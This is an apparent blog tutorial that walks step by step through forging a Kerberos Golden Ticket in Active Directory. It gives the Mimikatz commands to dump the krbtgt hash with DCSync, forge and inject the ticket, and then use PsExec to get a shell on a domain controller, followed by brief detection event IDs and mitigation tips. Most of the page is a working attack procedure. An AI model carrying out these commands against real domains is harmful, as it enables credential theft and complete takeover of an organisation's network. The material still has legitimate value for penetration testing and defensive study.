...
Write
OneWriteup
  • Login
  • Register
  • Trending
  • Articles
  • Blog
  • Tutorials
  • News
  • Research
  • Top 10 Lists
  • Case Studies
  • Writeup
  • Interviews
  • Personal Stories
  • Infographics
No Result
View All Result
  • Trending
  • Articles
  • Blog
  • Tutorials
  • News
  • Research
  • Top 10 Lists
  • Case Studies
  • Writeup
  • Interviews
  • Personal Stories
  • Infographics
No Result
View All Result
OneWriteup
No Result
View All Result

How to perform Golden Ticket Attack in Active Directory in 2024?

FOUNDER by FOUNDER
October 29, 2024
Reading Time: 7 mins read
21
0
Golden Ticket Attack
Share on FacebookShare on Twitter

What is a Golden Ticket?

A Golden Ticket is a forged Kerberos-Ticket Granting Ticket which grants complete access to AD environment.

What is Golden Ticket Attack?

Golden Ticket Attack is a type of cyberattack in Active Directory Environment. It exploits Microsoft  Kerberos Authentication Protocol which is windows default authentication protocol. The threat actor craft’s a golden ticket by compromising the “krbtgt” account , By using this golden ticket the attacker gets unrestricted access to an organization’s entire domain—including devices, files, and domain controllers.

Tools used for Golden Ticket Attack.

1. Mimikatz

  • It is a  well-known tool for extracting credentials from Windows memory, enabling attackers to retrieve password hashes, plaintext passwords, and Kerberos tickets, which can then be used to forge Golden Tickets.

2. Impacket

  • Its is a  Python toolkit for handling network protocols and includes utilities for tasks like remote execution and Kerberos ticket creation, particularly useful for generating Golden Tickets.

3. Rubeus

  • It is a  C# tool designed for managing Kerberos tickets, allowing attackers to request, inject, and manipulate tickets, including the use of Golden Tickets for persistent access.

4. Metasploit Framework

  • It is a  penetration testing framework with modules for exploiting, credential dumping, and post-exploitation; integrates with Mimikatz for injecting Golden Tickets to maintain privileged access in Active Directory.

Requirements for Golden Ticket Attack.

The attacker needs access to a machine that is part of the Active Directory environment and must have local administrator privileges on that machine to run Mimikatz with elevated permissions (“Run as Administrator”).

 

How to perform a Golden Ticket Attack?

Step 1: Download and Install Mimikatz

  1. Download the Mimikatz tool from the official GitHub repository:
    • https://github.com/ParrotSec/mimikatz
  2. Run Mimikatz as an Administrator to ensure it has the necessary privileges.Golden Ticket Attack

Step 2: Obtain Privilege Elevation in Mimikatz

  1. In the Mimikatz command prompt, elevate privileges by running:
    privilege::debug

Step 3: Dump the krbtgt NTLM Hash and SID

  1. Run the following command to retrieve the krbtgt NTLM hash and domain SID:
    lsadump::dcsync /domain:kserver.local /user:krbtgt

    Replace kserver.local with your actual domain name.
    Golden Ticket Attack

Step 4: Generate a Golden Ticket

  1. With the obtained NTLM hash and SID, use the following command to create a Golden Ticket:
    kerberos::golden /user:administrator /domain:kserver.local /sid:S-1-5-21-1202111685-2363350227-2141688259-502 /krbtgt:986ac3293eae2f5cc428808c41e8b894 /id:500
    • Explanation of parameters:
      • /user: Target user account (e.g., administrator).
      • /domain: Target domain (e.g., kserver.local).
      • /sid: Domain Security Identifier (SID).
      • /krbtgt: NTLM hash of the krbtgt account.
      • /id: User ID (typically 500 for admin).
    • This command saves the Golden Ticket to a file named ticket.kirbi.

Golden Ticket Attack

Step 5: Load the Golden Ticket

  1. Load the Golden Ticket into your session:
    kerberos::ptt ticket.kirbi

Golden Ticket Attack

Step 6: Open a New Command Prompt with the Ticket

  1. Start a new command prompt window to use the Golden Ticket with:
    misc::cmd

Step 7: Download and Set Up PsTools

  1. Download PsTools from Microsoft’s official website:
    • PsTools Download
  2. PsExec will allow remote command execution on the domain controller.

Step 8: Execute Commands Remotely

  1. In the Mimikatz command prompt, run PsExec to gain access to the domain controller:
    PsExec64.exe \\192.168.1.150 cmd.exe

Replace 192.168.1.150 with the IP or domain name of your target machine.Golden Ticket Attack

 

Complete Video Tutorial:

 

How to Detect Golden Ticket Attack at SIEM?

Event IDs to monitor:

ADVERTISEMENT
  1. 4769: Service Ticket Request (TGS) — Can reveal suspicious service requests from high-privilege accounts.
  2. 4624 (Logon) — Look for direct logins or activity associated with the krbtgt account.

How to mitigate Golden Ticket Attack?

  1. Regularly Reset the krbtgt Account Password.
  2. Limit Privilege Escalation and Privileged Account Access.
  3. Implement Enhanced Kerberos Security Policies
  4. Apply LAPS (Local Administrator Password Solution)
  5. Use Smart Card Authentication or Multifactor Authentication (MFA)

Read Similar Articles:

What is Password Spraying Attack? Complete Practical Guide 2024.

ADVERTISEMENT
FOUNDER

FOUNDER

Cybersecurity aficionado committed to disseminating expertise, crafting articles that empower others to resolve errors and fortify online defenses with ease.

Recently Posted

HOW To BECOME AN ETHICAL HACKER ROADMAP

Free Cybersecurity Roadmap for Ethical Hacking Career in 2025

November 15, 2024
736
Top 4 Cyber attacks Commonly used for Hacking Websites!

Top 4 Cyber attacks Commonly used for Hacking Websites!

November 9, 2024
168
How to use bloodhound tool for pentesting

How to use Bloodhound / Sharphound for Pentesting Active Directory?

November 6, 2024
500
Pass The Hash

How to perform Pass The Hash Attack on Active Directory in 2024?

November 2, 2024
153
Load More

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

ADVERTISEMENT

Recommended

how-i-hacked-a-hack-the-box-machine-using-ai

How I Hacked a Hack The Box Machine “Jarvis” Using White Rabbit Neo AI ?

September 17, 2024
181
Understanding Cyberbullying in 2024:  Issues, causes and Precaution

Understanding Cyberbullying in 2024: Issues, causes and Precaution

October 9, 2024
182

Popular Story

  • Download the Top 100 Free Cybersecurity Courses, Resources, and Study Materials for 2024

    Download the Top 100 Free Cybersecurity Courses, Resources, and Study Materials for 2024

    824 shares
    Share 330 Tweet 206
  • Top 10 Ethical Hacking and Exam Prep Books: including free PDF links

    81 shares
    Share 32 Tweet 20
  • Termux Top 10 Most Powerful Tools in 2024

    314 shares
    Share 126 Tweet 79
  • Top Cyber Security VAPT Interview Preparation Questions in 2024

    87 shares
    Share 35 Tweet 22
  • How To Setup Cybersecurity HomeLab for Red Team and Blue Team?

    162 shares
    Share 65 Tweet 41
ADVERTISEMENT
OneWriteup

Discover expert cybersecurity articles, tutorials, and the latest trends to protect your digital world.

  • OneWriteup Labs
  • About Us
  • Feedback
  • Contact Us
  • Report
  • Privacy Policy
  • Community Guidelines
  • Terms Of Service

© 2024 OneWriteup

No Result
View All Result
  • Trending
  • Articles
  • News
  • Blog
  • Tutorials
  • Research
  • Top 10 Lists
  • Case Studies
  • Interviews
  • Login
  • Sign Up

© 2024 OneWriteup

Welcome Back!

Login to your account below

Forgotten Password? Sign Up

Create New Account!

Fill the forms below to register

All fields are required. Log In

Retrieve your password

Please enter your username or email address to reset your password.

Log In
Seraphinite AcceleratorOptimized by Seraphinite Accelerator
Turns on site high speed to be attractive for people and search engines.